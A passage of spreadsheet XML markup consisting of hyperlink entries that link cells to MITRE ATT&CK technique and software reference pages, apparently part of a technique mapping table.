    <hyperlink ref="A49" r:id="rId103" display="https://attack.mitre.org/techniques/T1039" xr:uid="{D2B14A57-016C-BA4C-8AC7-2B21A212DEBD}"/>
    <hyperlink ref="B49" r:id="rId104" display="https://attack.mitre.org/techniques/T1039" xr:uid="{A66F087A-1B19-8043-840C-866CB3E195BA}"/>
    <hyperlink ref="A50" r:id="rId105" display="https://attack.mitre.org/techniques/T1025" xr:uid="{2B49EDB9-8516-2F41-89FC-65E2EE6117DB}"/>
    <hyperlink ref="B50" r:id="rId106" display="https://attack.mitre.org/techniques/T1025" xr:uid="{52FC69FF-93A6-2A4B-B701-E29B71960164}"/>
    <hyperlink ref="A51" r:id="rId107" display="https://attack.mitre.org/techniques/T1001" xr:uid="{054E711D-7573-FB46-80B0-83B528E4183C}"/>
    <hyperlink ref="B51" r:id="rId108" display="https://attack.mitre.org/techniques/T1001" xr:uid="{86D3037F-674B-0D49-ACA5-68A3EBBAC6B7}"/>
    <hyperlink ref="A52" r:id="rId109" display="https://attack.mitre.org/techniques/T1074" xr:uid="{51657B73-AB04-644A-AD5A-9B6BD6E4E30F}"/>
    <hyperlink ref="B52" r:id="rId110" display="https://attack.mitre.org/techniques/T1074" xr:uid="{A35EF58F-925B-3246-8CC6-FB27DC3F91F2}"/>
    <hyperlink ref="A53" r:id="rId111" display="https://attack.mitre.org/techniques/T1030" xr:uid="{0F013025-11DC-B04F-8FE8-E40E07606B05}"/>
    <hyperlink ref="B53" r:id="rId112" display="https://attack.mitre.org/techniques/T1030" xr:uid="{051876B9-79A5-914B-92B2-1FC65522B56B}"/>
    <hyperlink ref="A54" r:id="rId113" display="https://attack.mitre.org/techniques/T1207" xr:uid="{6035438A-198A-2248-9E68-E5B55E82D2A4}"/>
    <hyperlink ref="B54" r:id="rId114" display="https://attack.mitre.org/techniques/T1207" xr:uid="{33AA5DEA-2161-5645-8337-95CF587679DB}"/>
    <hyperlink ref="A55" r:id="rId115" display="https://attack.mitre.org/techniques/T1140" xr:uid="{7058FBFE-B36F-2B4A-8FA5-A6B3000E4F9E}"/>
    <hyperlink ref="B55" r:id="rId116" display="https://attack.mitre.org/techniques/T1140" xr:uid="{CF1CBC1F-DC27-3A44-A014-236643F92666}"/>
    <hyperlink ref="A56" r:id="rId117" display="https://attack.mitre.org/techniques/T1089" xr:uid="{AA086504-F4CC-7043-8941-3483BB4AAFBA}"/>
    <hyperlink ref="B56" r:id="rId118" display="https://attack.mitre.org/techniques/T1089" xr:uid="{16B7E6C9-CF7B-964C-B26C-C413C74024A3}"/>
    <hyperlink ref="A57" r:id="rId119" display="https://attack.mitre.org/techniques/T1175" xr:uid="{24334759-987B-264F-A9EC-5075912D1FB8}"/>
    <hyperlink ref="B57" r:id="rId120" display="https://attack.mitre.org/techniques/T1175" xr:uid="{666886E2-1ABB-1346-9F47-437B943F2EE9}"/>
    <hyperlink ref="A58" r:id="rId121" display="https://attack.mitre.org/techniques/T1038" xr:uid="{2E1BC539-33F4-1F45-A6BC-8CBCD8A7EC81}"/>
    <hyperlink ref="B58" r:id="rId122" display="https://attack.mitre.org/techniques/T1038" xr:uid="{1979F265-0D9F-8F45-93F2-A4F9EC21159B}"/>
    <hyperlink ref="A59" r:id="rId123" display="https://attack.mitre.org/techniques/T1073" xr:uid="{821F24DF-92AB-D545-BD85-BA3776BBF077}"/>
    <hyperlink ref="B59" r:id="rId124" display="https://attack.mitre.org/techniques/T1073" xr:uid="{11AB7321-7602-CB41-9B56-822AC0091C0B}"/>
    <hyperlink ref="A60" r:id="rId125" display="https://attack.mitre.org/techniques/T1172" xr:uid="{D93CEF71-4DED-064C-B558-46A394EBCDFF}"/>
    <hyperlink ref="B60" r:id="rId126" display="https://attack.mitre.org/techniques/T1172" xr:uid="{D02667FC-9F8F-3F4B-8252-A0C5278BC005}"/>
    <hyperlink ref="A61" r:id="rId127" display="https://attack.mitre.org/techniques/T1189" xr:uid="{787AD688-EB26-B84D-8B0B-CB2E3273F898}"/>
    <hyperlink ref="B61" r:id="rId128" display="https://attack.mitre.org/techniques/T1189" xr:uid="{799123A0-7127-2240-A478-C073F15DC99A}"/>
    <hyperlink ref="A62" r:id="rId129" display="https://attack.mitre.org/techniques/T1157" xr:uid="{5FE04E99-621E-914C-9F3C-5CFC4140B110}"/>
    <hyperlink ref="B62" r:id="rId130" display="https://attack.mitre.org/techniques/T1157" xr:uid="{2898D1BB-1174-5C44-A46A-445F22DF628A}"/>
    <hyperlink ref="A63" r:id="rId131" display="https://attack.mitre.org/techniques/T1173" xr:uid="{EBCA68A3-0888-154C-B42A-FB029E5EF72E}"/>
    <hyperlink ref="B63" r:id="rId132" display="https://attack.mitre.org/techniques/T1173" xr:uid="{CD10243E-72B0-9347-8D36-0C449DE0ED38}"/>
    <hyperlink ref="A64" r:id="rId133" display="https://attack.mitre.org/techniques/T1114" xr:uid="{9C193EEF-D938-4149-816C-E39EAEAF1DA5}"/>
    <hyperlink ref="B64" r:id="rId134" display="https://attack.mitre.org/techniques/T1114" xr:uid="{CD3694E8-99FB-554F-A61C-A154D8BBCE96}"/>
    <hyperlink ref="A65" r:id="rId135" display="https://attack.mitre.org/techniques/T1106" xr:uid="{A6307D7A-067A-A642-BB4B-95CACEE3CF54}"/>
    <hyperlink ref="B65" r:id="rId136" display="https://attack.mitre.org/techniques/T1106" xr:uid="{8B46D9FC-219A-FB4A-B91D-9B7F694722A8}"/>
    <hyperlink ref="A66" r:id="rId137" display="https://attack.mitre.org/techniques/T1129" xr:uid="{596C7546-99D1-AD49-9B68-05A59BE40B61}"/>
    <hyperlink ref="B66" r:id="rId138" display="https://attack.mitre.org/techniques/T1129" xr:uid="{A89E8057-F62C-DD45-BADC-3D896365126A}"/>
    <hyperlink ref="A67" r:id="rId139" display="https://attack.mitre.org/techniques/T1048" xr:uid="{45E2D21B-CB98-FA41-BC44-CC5D49294444}"/>
    <hyperlink ref="B67" r:id="rId140" display="https://attack.mitre.org/techniques/T1048" xr:uid="{30BE769C-5C93-7047-A0EF-AC120CCCD970}"/>
    <hyperlink ref="A68" r:id="rId141" display="https://attack.mitre.org/techniques/T1041" xr:uid="{084A64B0-70AB-A54F-A83C-92457240E165}"/>
    <hyperlink ref="B68" r:id="rId142" display="https://attack.mitre.org/techniques/T1041" xr:uid="{9EDD3336-2919-714A-89D0-4CF73F1BBFDE}"/>
    <hyperlink ref="A69" r:id="rId143" display="https://attack.mitre.org/techniques/T1011" xr:uid="{229E3497-9AC7-4045-95B0-2E35BC1D487C}"/>
    <hyperlink ref="B69" r:id="rId144" display="https://attack.mitre.org/techniques/T1011" xr:uid="{2485AD08-1742-FB4D-B1E6-210ED136DDF5}"/>
    <hyperlink ref="A70" r:id="rId145" display="https://attack.mitre.org/techniques/T1052" xr:uid="{E31F491A-4E41-2248-AFA4-921CFF6F0F18}"/>
    <hyperlink ref="B70" r:id="rId146" display="https://attack.mitre.org/techniques/T1052" xr:uid="{A59650CB-E3D6-5245-B397-F091A1D1E095}"/>
    <hyperlink ref="A71" r:id="rId147" display="https://attack.mitre.org/techniques/T1190" xr:uid="{D9E4F543-66F6-D74D-AFA9-3614E0CD9A9D}"/>
    <hyperlink ref="B71" r:id="rId148" display="https://attack.mitre.org/techniques/T1190" xr:uid="{F778DAF4-F9A5-3C46-8440-E2A30EFEA67A}"/>
    <hyperlink ref="C71" r:id="rId149" display="https://attack.mitre.org/techniques/T1211" xr:uid="{EE505168-0BC3-5547-81D1-BC1EC2271563}"/>
    <hyperlink ref="A72" r:id="rId150" display="https://attack.mitre.org/techniques/T1203" xr:uid="{853243AB-DD31-F24B-AF5D-05C6AE33B3C4}"/>
    <hyperlink ref="B72" r:id="rId151" display="https://attack.mitre.org/techniques/T1203" xr:uid="{D88CAC9B-042E-C04E-AC81-A9B585414BB7}"/>
    <hyperlink ref="A73" r:id="rId152" display="https://attack.mitre.org/techniques/T1212" xr:uid="{A4DFF483-CCB9-ED4B-B1D0-82ADC16103FE}"/>
    <hyperlink ref="B73" r:id="rId153" display="https://attack.mitre.org/techniques/T1212" xr:uid="{D858041A-5DC7-E04E-8B7E-66D70AAA35D2}"/>
    <hyperlink ref="A74" r:id="rId154" display="https://attack.mitre.org/techniques/T1211" xr:uid="{5715097B-B0D6-5D4D-B81D-3B24A8C6C4D6}"/>
    <hyperlink ref="B74" r:id="rId155" display="https://attack.mitre.org/techniques/T1211" xr:uid="{87716DE1-A5EC-7246-A987-A2C58E12F7CB}"/>
    <hyperlink ref="A75" r:id="rId156" display="https://attack.mitre.org/techniques/T1068" xr:uid="{D919C3E3-9AA9-3140-AFA4-8A75D80F8A49}"/>
    <hyperlink ref="B75" r:id="rId157" display="https://attack.mitre.org/techniques/T1068" xr:uid="{055827C0-1050-DC43-8070-E4B68DCC5EF1}"/>
    <hyperlink ref="A76" r:id="rId158" display="https://attack.mitre.org/techniques/T1210" xr:uid="{9AA3D574-43EF-EE4C-844E-119797F2E49A}"/>
    <hyperlink ref="B76" r:id="rId159" display="https://attack.mitre.org/techniques/T1210" xr:uid="{0B3442A8-CC14-284C-BA55-FC2AE2B5E4B8}"/>
    <hyperlink ref="A77" r:id="rId160" display="https://attack.mitre.org/techniques/T1133" xr:uid="{B61F737B-100F-2141-9DE0-701FE0CCB1AA}"/>
    <hyperlink ref="B77" r:id="rId161" display="https://attack.mitre.org/techniques/T1133" xr:uid="{32767564-DD2B-8246-8FEB-D8167D7E4B78}"/>
    <hyperlink ref="C77" r:id="rId162" display="https://attack.mitre.org/techniques/T1028" xr:uid="{D1BFE725-1DDE-554C-AAED-B1F081B3CCC3}"/>
    <hyperlink ref="A78" r:id="rId163" display="https://attack.mitre.org/techniques/T1181" xr:uid="{8CA45FC6-0EA3-C841-AEE7-6D73A7FD38C6}"/>
    <hyperlink ref="B78" r:id="rId164" display="https://attack.mitre.org/techniques/T1181" xr:uid="{833F08D3-B2A5-054D-9ED6-E181C1BFF3F3}"/>
    <hyperlink ref="A79" r:id="rId165" display="https://attack.mitre.org/techniques/T1008" xr:uid="{014798E9-971C-804F-9B7A-CF287652EAFE}"/>
    <hyperlink ref="B79" r:id="rId166" display="https://attack.mitre.org/techniques/T1008" xr:uid="{3448348A-51B8-5E44-B110-66A18B9BCB44}"/>
    <hyperlink ref="A80" r:id="rId167" display="https://attack.mitre.org/techniques/T1083" xr:uid="{D80AF954-AB80-8C40-8382-79098F6C25A6}"/>
    <hyperlink ref="B80" r:id="rId168" display="https://attack.mitre.org/techniques/T1083" xr:uid="{6502610D-C8C5-CB4A-9F3E-268939366F18}"/>
    <hyperlink ref="A81" r:id="rId169" display="https://attack.mitre.org/techniques/T1107" xr:uid="{D45E7F5C-D21A-0742-B71B-C239A2602F9F}"/>
    <hyperlink ref="B81" r:id="rId170" display="https://attack.mitre.org/techniques/T1107" xr:uid="{A8769192-4676-7045-9044-CE304C820334}"/>
    <hyperlink ref="A82" r:id="rId171" display="https://attack.mitre.org/techniques/T1222" xr:uid="{B4D05F18-7BC4-A84B-B06A-AD256795A547}"/>
    <hyperlink ref="B82" r:id="rId172" display="https://attack.mitre.org/techniques/T1222" xr:uid="{361F7E10-26DB-A14A-8799-563AFDDA313A}"/>
    <hyperlink ref="A83" r:id="rId173" display="https://attack.mitre.org/techniques/T1006" xr:uid="{2D87CAFD-2CC1-AD4A-9D9F-583EEF0008D2}"/>
    <hyperlink ref="B83" r:id="rId174" display="https://attack.mitre.org/techniques/T1006" xr:uid="{1BE12B5D-829F-084F-A937-C6695C4A97C3}"/>
    <hyperlink ref="A84" r:id="rId175" display="https://attack.mitre.org/techniques/T1044" xr:uid="{9D05835B-2B89-D246-BF46-E0823B68AA55}"/>
    <hyperlink ref="B84" r:id="rId176" display="https://attack.mitre.org/techniques/T1044" xr:uid="{2CC54AEF-B676-5043-AB7E-ECBAB02728AF}"/>
    <hyperlink ref="A85" r:id="rId177" display="https://attack.mitre.org/techniques/T1187" xr:uid="{D31EBA12-24E7-514A-982E-1ABB13074C50}"/>
    <hyperlink ref="B85" r:id="rId178" display="https://attack.mitre.org/techniques/T1187" xr:uid="{653F1A01-AC7C-3143-AE58-B21451DDCC96}"/>
    <hyperlink ref="A86" r:id="rId179" display="https://attack.mitre.org/techniques/T1144" xr:uid="{74F6F745-E6E3-CD46-90BD-97B18501BDB3}"/>
    <hyperlink ref="B86" r:id="rId180" display="https://attack.mitre.org/techniques/T1144" xr:uid="{7C25FABF-091B-E446-AE4B-AD3A33D3ED1E}"/>
    <hyperlink ref="A87" r:id="rId181" display="https://attack.mitre.org/techniques/T1061" xr:uid="{285AF743-80F2-B546-8029-2CC0381022AE}"/>
    <hyperlink ref="B87" r:id="rId182" display="https://attack.mitre.org/techniques/T1061" xr:uid="{CD3C3BE5-DE51-0245-9F0B-16474AD5B450}"/>
    <hyperlink ref="A88" r:id="rId183" display="https://attack.mitre.org/techniques/T1200" xr:uid="{986FB848-E488-E647-A5CB-53C3E932CA63}"/>
    <hyperlink ref="B88" r:id="rId184" display="https://attack.mitre.org/techniques/T1200" xr:uid="{09AFB1CB-6F70-A841-B6EB-4B804447BEE1}"/>
    <hyperlink ref="A89" r:id="rId185" display="https://attack.mitre.org/techniques/T1158" xr:uid="{67580A59-5703-A348-A7B1-A73BEE30166A}"/>
    <hyperlink ref="B89" r:id="rId186" display="https://attack.mitre.org/techniques/T1158" xr:uid="{10544D81-D053-834C-92BC-B0EEC5A8CA19}"/>
    <hyperlink ref="A90" r:id="rId187" display="https://attack.mitre.org/techniques/T1147" xr:uid="{FC28B366-D18F-454C-BAD9-BD6705D0F5C6}"/>
    <hyperlink ref="B90" r:id="rId188" display="https://attack.mitre.org/techniques/T1147" xr:uid="{AF64340F-6B4F-F84C-AD35-9BD3EF7D7F64}"/>
    <hyperlink ref="C90" r:id="rId189" display="https://attack.mitre.org/techniques/T1136" xr:uid="{2A856D67-AAF3-D04E-B2F6-42532195C263}"/>
    <hyperlink ref="A91" r:id="rId190" display="https://attack.mitre.org/techniques/T1143" xr:uid="{B5367DFC-14FF-2245-885C-1C9072E342B9}"/>
    <hyperlink ref="B91" r:id="rId191" display="https://attack.mitre.org/techniques/T1143" xr:uid="{EF225ED3-BE16-E64D-B7B0-71BC111C305E}"/>
    <hyperlink ref="A92" r:id="rId192" display="https://attack.mitre.org/techniques/T1148" xr:uid="{257AAD75-6538-594E-A126-6B822B1B823C}"/>
    <hyperlink ref="B92" r:id="rId193" display="https://attack.mitre.org/techniques/T1148" xr:uid="{1E82F82C-C149-774F-A87E-71F6615289D6}"/>
    <hyperlink ref="A93" r:id="rId194" display="https://attack.mitre.org/techniques/T1179" xr:uid="{56DAFB5A-7D8F-0141-B916-CEBAC0331613}"/>
    <hyperlink ref="B93" r:id="rId195" display="https://attack.mitre.org/techniques/T1179" xr:uid="{BD271748-BC8D-D14E-A4B2-631C4D2AB28D}"/>
    <hyperlink ref="A94" r:id="rId196" display="https://attack.mitre.org/techniques/T1062" xr:uid="{AA96E71D-5506-9A4D-A555-7DB95C061E9F}"/>
    <hyperlink ref="B94" r:id="rId197" display="https://attack.mitre.org/techniques/T1062" xr:uid="{3A44E815-5487-F146-B27E-4262DA51EBA8}"/>
    <hyperlink ref="C94" r:id="rId198" display="https://attack.mitre.org/techniques/T1014" xr:uid="{5A753EF8-B51A-7F47-8699-59B7C872721E}"/>
    <hyperlink ref="A95" r:id="rId199" display="https://attack.mitre.org/techniques/T1183" xr:uid="{60D04492-46C3-8646-9735-517EE3550F21}"/>
    <hyperlink ref="B95" r:id="rId200" display="https://attack.mitre.org/techniques/T1183" xr:uid="{BC7FBACE-60AC-7940-8B30-DF353879D6BD}"/>
    <hyperlink ref="A96" r:id="rId201" display="https://attack.mitre.org/techniques/T1054" xr:uid="{4EA3FC65-C66E-E449-B385-9201677C732F}"/>
    <hyperlink ref="B96" r:id="rId202" display="https://attack.mitre.org/techniques/T1054" xr:uid="{4A42F23C-15BA-CD48-90A6-21886ABA99EE}"/>
    <hyperlink ref="A97" r:id="rId203" display="https://attack.mitre.org/techniques/T1066" xr:uid="{3600EF4A-11EB-2844-A21C-1DD0ADBB54CB}"/>
    <hyperlink ref="B97" r:id="rId204" display="https://attack.mitre.org/techniques/T1066" xr:uid="{2FE0B755-C048-D047-A5ED-DE57F4A3B85A}"/>
    <hyperlink ref="A98" r:id="rId205" display="https://attack.mitre.org/techniques/T1070" xr:uid="{850E3E23-271E-CB41-8BB4-4F7E66F0687F}"/>
    <hyperlink ref="B98" r:id="rId206" display="https://attack.mitre.org/techniques/T1070" xr:uid="{DB79FC5D-32BE-EF4A-B803-E4C9733A6927}"/>
    <hyperlink ref="C98" r:id="rId207" display="https://attack.mitre.org/techniques/T1139" xr:uid="{E115FA1C-CD54-B34E-8BA7-C0BBE0976A26}"/>
    <hyperlink ref="A99" r:id="rId208" display="https://attack.mitre.org/techniques/T1202" xr:uid="{7B673E93-3D38-D140-A9BF-C5BFFB4CEA44}"/>
    <hyperlink ref="B99" r:id="rId209" display="https://attack.mitre.org/techniques/T1202" xr:uid="{C19AAEBC-FEFC-DC4F-885F-D182D924A793}"/>
    <hyperlink ref="A100" r:id="rId210" display="https://attack.mitre.org/techniques/T1056" xr:uid="{9CA44EB5-2904-4343-8F8B-E39A8349DC68}"/>
    <hyperlink ref="B100" r:id="rId211" display="https://attack.mitre.org/techniques/T1056" xr:uid="{E3CC8867-242C-8349-BC4A-A219A6941691}"/>
    <hyperlink ref="C100" r:id="rId212" display="https://attack.mitre.org/techniques/T1078" xr:uid="{B2A2908A-CA06-8846-BF60-DE5B892D15C3}"/>
    <hyperlink ref="A101" r:id="rId213" display="https://attack.mitre.org/techniques/T1141" xr:uid="{CAB25F78-4898-F04D-80B1-C0E19629FD7C}"/>
    <hyperlink ref="B101" r:id="rId214" display="https://attack.mitre.org/techniques/T1141" xr:uid="{8B217940-EA8E-CF4C-82D4-1F6F70D4B411}"/>
    <hyperlink ref="A102" r:id="rId215" display="https://attack.mitre.org/techniques/T1130" xr:uid="{D6FD731C-7E95-0447-B7B0-8A3DDC6561C9}"/>
    <hyperlink ref="B102" r:id="rId216" display="https://attack.mitre.org/techniques/T1130" xr:uid="{567ACF31-7DAA-4142-8BA7-89259F334EF4}"/>
    <hyperlink ref="A103" r:id="rId217" display="https://attack.mitre.org/techniques/T1118" xr:uid="{13185783-7320-4D4A-8AE8-C89B50FAAF79}"/>
    <hyperlink ref="B103" r:id="rId218" display="https://attack.mitre.org/techniques/T1118" xr:uid="{74DB6A10-6505-EA4E-9C7E-3460D764D0B0}"/>
    <hyperlink ref="A104" r:id="rId219" display="https://attack.mitre.org/techniques/T1208" xr:uid="{9B27E19A-4520-C042-87CA-9B02A52999DB}"/>
    <hyperlink ref="B104" r:id="rId220" display="https://attack.mitre.org/techniques/T1208" xr:uid="{0E1BCD15-1474-F44D-994E-E8DE49949C04}"/>
    <hyperlink ref="A105" r:id="rId221" display="https://attack.mitre.org/techniques/T1215" xr:uid="{DEBAD2AA-02CA-5741-A5FB-50A4C4D22391}"/>
    <hyperlink ref="B105" r:id="rId222" display="https://attack.mitre.org/techniques/T1215" xr:uid="{B95B453C-D36D-194F-ACAE-5A484E13B722}"/>
    <hyperlink ref="C105" r:id="rId223" display="https://attack.mitre.org/techniques/T1014" xr:uid="{E5F094FA-F4DF-124F-9AEF-DA17D142F28C}"/>
    <hyperlink ref="A106" r:id="rId224" display="https://attack.mitre.org/techniques/T1142" xr:uid="{BFD52D38-57E5-AD45-8C76-BC67801FCDB9}"/>
    <hyperlink ref="B106" r:id="rId225" display="https://attack.mitre.org/techniques/T1142" xr:uid="{9EB3062C-6243-D14F-A71D-8A219555F514}"/>
    <hyperlink ref="A107" r:id="rId226" display="https://attack.mitre.org/techniques/T1159" xr:uid="{7CBDA55D-9EF4-A34F-BE37-400D32007990}"/>
    <hyperlink ref="B107" r:id="rId227" display="https://attack.mitre.org/techniques/T1159" xr:uid="{23B6D000-F926-9D4D-A072-3B9CA7F83416}"/>
    <hyperlink ref="A108" r:id="rId228" display="https://attack.mitre.org/techniques/T1160" xr:uid="{DA623FB3-7EFD-D640-B613-20474843B32D}"/>
    <hyperlink ref="B108" r:id="rId229" display="https://attack.mitre.org/techniques/T1160" xr:uid="{533101F9-7560-9D47-818D-9D7AF197D68F}"/>
    <hyperlink ref="A109" r:id="rId230" display="https://attack.mitre.org/techniques/T1152" xr:uid="{17339C54-29F1-EC47-9827-699D476375F4}"/>
    <hyperlink ref="B109" r:id="rId231" display="https://attack.mitre.org/techniques/T1152" xr:uid="{E6E7EDF3-001A-4249-BBD0-E7DBAA64FF28}"/>
    <hyperlink ref="A110" r:id="rId232" display="https://attack.mitre.org/techniques/T1161" xr:uid="{41F83BB0-1136-D64E-B553-34028458AF10}"/>
    <hyperlink ref="B110" r:id="rId233" display="https://attack.mitre.org/techniques/T1161" xr:uid="{ADEF39BA-5C85-4A42-AEBF-AF3E7A7E5317}"/>
    <hyperlink ref="A111" r:id="rId234" display="https://attack.mitre.org/techniques/T1149" xr:uid="{0CD9A3CD-7982-C542-9E97-C03138E359A7}"/>
    <hyperlink ref="B111" r:id="rId235" display="https://attack.mitre.org/techniques/T1149" xr:uid="{5DFC959A-9203-E643-A66C-5308E4A1C25F}"/>
    <hyperlink ref="A112" r:id="rId236" display="https://attack.mitre.org/techniques/T1171" xr:uid="{A2514AA5-3BC5-3143-B8A2-84108C45B736}"/>
    <hyperlink ref="B112" r:id="rId237" display="https://attack.mitre.org/techniques/T1171" xr:uid="{7CB9D2CF-FA09-2943-8015-B91EACA17D14}"/>
    <hyperlink ref="A113" r:id="rId238" display="https://attack.mitre.org/techniques/T1168" xr:uid="{319FAC7F-4B14-7049-BA79-77DED3EDD83A}"/>
    <hyperlink ref="B113" r:id="rId239" display="https://attack.mitre.org/techniques/T1168" xr:uid="{EF7D122A-11C3-F147-A725-65DA4E3BB04D}"/>
    <hyperlink ref="C113" r:id="rId240" display="https://attack.mitre.org/techniques/T1053" xr:uid="{6AA13043-C01C-F742-A313-E61198D81CD5}"/>
    <hyperlink ref="A114" r:id="rId241" display="https://attack.mitre.org/techniques/T1162" xr:uid="{AF17A517-4786-0146-8804-CEDEE76E0A8E}"/>
    <hyperlink ref="B114" r:id="rId242" display="https://attack.mitre.org/techniques/T1162" xr:uid="{2E411CCB-343D-3042-ADD9-1B9B77901562}"/>
    <hyperlink ref="C114" r:id="rId243" display="https://attack.mitre.org/techniques/T1155" xr:uid="{50760BCA-2CE1-F941-B0B2-4F24C6EEBFC8}"/>
    <hyperlink ref="A115" r:id="rId244" display="https://attack.mitre.org/techniques/T1037" xr:uid="{9923461F-E574-EA4E-8B27-356105878198}"/>
    <hyperlink ref="B115" r:id="rId245" display="https://attack.mitre.org/techniques/T1037" xr:uid="{6846BA67-7645-BF45-A6EC-722586B95835}"/>
    <hyperlink ref="A116" r:id="rId246" display="https://attack.mitre.org/techniques/T1177" xr:uid="{07A029E3-DEC7-1144-82BD-031D9BE333D0}"/>
    <hyperlink ref="B116" r:id="rId247" display="https://attack.mitre.org/techniques/T1177" xr:uid="{D3CDFB2E-27E3-0742-B0FF-55DA1B325D38}"/>
    <hyperlink ref="A117" r:id="rId248" display="https://attack.mitre.org/techniques/T1185" xr:uid="{A5F32CCF-961D-6D4A-8B52-B576D83FC661}"/>
    <hyperlink ref="B117" r:id="rId249" display="https://attack.mitre.org/techniques/T1185" xr:uid="{411DB919-2D43-1A4D-8E29-17695A5B17E7}"/>
    <hyperlink ref="A118" r:id="rId250" display="https://attack.mitre.org/techniques/T1036" xr:uid="{E25EDCF5-B4B9-9D4A-B6C7-C334F6DD8EE9}"/>
    <hyperlink ref="B118" r:id="rId251" display="https://attack.mitre.org/techniques/T1036" xr:uid="{53614CCE-3DC1-C849-B9AE-D50924EF960D}"/>
    <hyperlink ref="A119" r:id="rId252" display="https://attack.mitre.org/techniques/T1031" xr:uid="{D4ABF26C-1477-344A-9B57-1B829C501E6B}"/>
    <hyperlink ref="B119" r:id="rId253" display="https://attack.mitre.org/techniques/T1031" xr:uid="{72E5C40D-0CBF-9049-96E5-EAA7A8ACE101}"/>
    <hyperlink ref="C119" r:id="rId254" display="https://attack.mitre.org/software/S0075" xr:uid="{8EE2AAB6-EBFE-F44B-87B4-F2F56C6BF60E}"/>
    <hyperlink ref="A120" r:id="rId255" display="https://attack.mitre.org/techniques/T1112" xr:uid="{AA506AB5-4687-054B-8971-C80460919609}"/>
    <hyperlink ref="B120" r:id="rId256" display="https://attack.mitre.org/techniques/T1112" xr:uid="{E70C41A5-B56D-FF4E-842B-39EB5F838D25}"/>
    <hyperlink ref="A121" r:id="rId257" display="https://attack.mitre.org/techniques/T1170" xr:uid="{52AEC62C-2DA6-0A42-9A7D-83F2C09A0A4C}"/>
    <hyperlink ref="B121" r:id="rId258" display="https://attack.mitre.org/techniques/T1170" xr:uid="{C11C0D0F-D3FC-9C47-9389-3121EAF3894A}"/>
    <hyperlink ref="A122" r:id="rId259" display="https://attack.mitre.org/techniques/T1188" xr:uid="{074A5DBC-A888-CC49-82C7-CCFF13B488CF}"/>
    <hyperlink ref="B122" r:id="rId260" display="https://attack.mitre.org/techniques/T1188" xr:uid="{A295DCD4-47FF-3845-ACDD-9F9C8821C5F8}"/>
    <hyperlink ref="A123" r:id="rId261" display="https://attack.mitre.org/techniques/T1104" xr:uid="{7FF99054-2189-5A4F-B188-026529E2131B}"/>
    <hyperlink ref="B123" r:id="rId262" display="https://attack.mitre.org/techniques/T1104" xr:uid="{C4EAD422-FB82-ED40-8481-919F35159AEB}"/>
    <hyperlink ref="A124" r:id="rId263" display="https://attack.mitre.org/techniques/T1026" xr:uid="{81E0DA2A-FC2E-B640-9AA6-A40A1E0E58BE}"/>
    <hyperlink ref="B124" r:id="rId264" display="https://attack.mitre.org/techniques/T1026" xr:uid="{FA523DF3-904E-7041-8310-642AB97EBFA9}"/>
    <hyperlink ref="A125" r:id="rId265" display="https://attack.mitre.org/techniques/T1079" xr:uid="{CB391AF3-42BD-6A49-90D6-D3396F574114}"/>
    <hyperlink ref="B125" r:id="rId266" display="https://attack.mitre.org/techniques/T1079" xr:uid="{DCE0C0A9-FBEC-384A-A669-A1BE650FE39F}"/>
    <hyperlink ref="A126" r:id="rId267" display="https://attack.mitre.org/techniques/T1128" xr:uid="{A6334ADE-7AF6-E84F-900A-3323F50B67AD}"/>
    <hyperlink ref="B126" r:id="rId268" display="https://attack.mitre.org/techniques/T1128" xr:uid="{13ECD84C-0D03-624A-B20E-BA4337B99A5A}"/>
    <hyperlink ref="A127" r:id="rId269" display="https://attack.mitre.org/techniques/T1046" xr:uid="{B2474043-4D80-C84D-8E0B-9E63E30F1482}"/>
    <hyperlink ref="B127" r:id="rId270" display="https://attack.mitre.org/techniques/T1046" xr:uid="{968BE738-F2BE-7F48-BA09-787E0D5524D0}"/>
    <hyperlink ref="A128" r:id="rId271" display="https://attack.mitre.org/techniques/T1126" xr:uid="{DC8732CA-8709-C046-BA88-DF4BBE5AB1F2}"/>
    <hyperlink ref="B128" r:id="rId272" display="https://attack.mitre.org/techniques/T1126" xr:uid="{E85D3B9C-7EC3-6B46-927E-CBAB0659517A}"/>
    <hyperlink ref="A129" r:id="rId273" display="https://attack.mitre.org/techniques/T1135" xr:uid="{34E16DA3-E6F7-8345-8523-9A26BC7042FC}"/>
    <hyperlink ref="B129" r:id="rId274" display="https://attack.mitre.org/techniques/T1135" xr:uid="{D57DE470-C639-E146-AD41-CF8E0930CB4D}"/>
    <hyperlink ref="A130" r:id="rId275" display="https://attack.mitre.org/techniques/T1040" xr:uid="{372ECDDB-DFCA-D84A-91B5-1584299F9764}"/>
    <hyperlink ref="B130" r:id="rId276" display="https://attack.mitre.org/techniques/T1040" xr:uid="{6A9F224B-6215-C84E-8BD4-AA43D64D13C2}"/>
    <hyperlink ref="A131" r:id="rId277" display="https://attack.mitre.org/techniques/T1050" xr:uid="{1CEC62FB-8E1B-964A-BC5E-F109D33A5D76}"/>
    <hyperlink ref="B131" r:id="rId278" display="https://attack.mitre.org/techniques/T1050" xr:uid="{66543BED-9339-7142-AE81-E6B871862C51}"/>
    <hyperlink ref="A132" r:id="rId279" display="https://attack.mitre.org/techniques/T1096" xr:uid="{CC3B7F8B-2D6F-F14B-8F05-5D7E66C83428}"/>
    <hyperlink ref="B132" r:id="rId280" display="https://attack.mitre.org/techniques/T1096" xr:uid="{F67E5AD0-8BFA-7E45-9602-6B9CA957075D}"/>
    <hyperlink ref="A133" r:id="rId281" display="https://attack.mitre.org/techniques/T1027" xr:uid="{7169F86B-E1BA-E44F-AB07-3A270C3651CD}"/>
    <hyperlink ref="B133" r:id="rId282" display="https://attack.mitre.org/techniques/T1027" xr:uid="{46A7E016-7B15-254B-A152-CBDC845F1B1F}"/>
    <hyperlink ref="A134" r:id="rId283" display="https://attack.mitre.org/techniques/T1137" xr:uid="{E9CDA7AF-E68E-084E-9791-6BEFF97C9D7F}"/>
    <hyperlink ref="B134" r:id="rId284" display="https://attack.mitre.org/techniques/T1137" xr:uid="{D347A7FE-C65C-FB46-8FD9-D0F9FABB5754}"/>
    <hyperlink ref="A135" r:id="rId285" display="https://attack.mitre.org/techniques/T1075" xr:uid="{81614284-0AD9-CC4A-93A5-B761FA45CE04}"/>
    <hyperlink ref="B135" r:id="rId286" display="https://attack.mitre.org/techniques/T1075" xr:uid="{82293392-0022-2945-BD0B-1BCBC1EC372C}"/>
    <hyperlink ref="A136" r:id="rId287" display="https://attack.mitre.org/techniques/T1097" xr:uid="{398FD7B9-4A34-9341-9813-6B8DC97E8BA7}"/>
    <hyperlink ref="B136" r:id="rId288" display="https://attack.mitre.org/techniques/T1097" xr:uid="{3E920D47-5A43-5F4F-B9EA-F3D8EF448DB4}"/>
